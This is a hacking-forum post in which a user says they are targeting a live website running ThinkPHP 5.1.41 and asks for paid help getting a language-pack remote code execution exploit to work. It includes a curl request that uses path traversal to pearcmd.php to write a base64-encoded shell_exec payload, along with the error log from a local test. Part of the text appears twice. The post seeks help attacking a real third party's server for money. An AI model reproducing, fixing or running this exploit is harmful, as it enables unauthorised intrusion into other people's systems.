- Joined
- Jun 2, 2024
- Messages
- 12
- Reaction score
- 0
- Points
- 1
- Thread Author
- #1
Hi everyone
A website I am targeting right now is based on thinkphp v5.1.41 and has a language pack so it's exposed to that vulnerability: Thinkphp 多语言 RCE - 跳跳糖.
And that example here shows an execution using the local pearcmd.php.
I'm trying locally in a VM with a dummy thinkphp v5.1.41 deployment, but I can't for the life of me make the RCE work.
Even that simple injection
just does not do anything and ends up in
Anyone has any tips? Can talk about $$
A website I am targeting right now is based on thinkphp v5.1.41 and has a language pack so it's exposed to that vulnerability: Thinkphp 多语言 RCE - 跳跳糖.
And that example here shows an execution using the local pearcmd.php.
I'm trying locally in a VM with a dummy thinkphp v5.1.41 deployment, but I can't for the life of me make the RCE work.
Even that simple injection
Code:
curl -X GET "http://127.0.0.1:8000/?lang=../../../../../usr/share/php/pearcmd&+config-create+/&/<?shell_exec(base64_decode(\"bWtkaXIgLXAgL3RtcC90b3RvCg==\"));?>" --http1.1
Code:
[2024-06-06T23:38:30+08:00] 127.0.0.1 GET 127.0.0.1:8000/?lang=../../../../../usr/share/php/pearcmd&config-create%20/tmp/pear.ini%20/
[ error ] [0]Fatal error: Cannot use object of type PEAR_Error as array
Anyone has any tips? Can talk about $$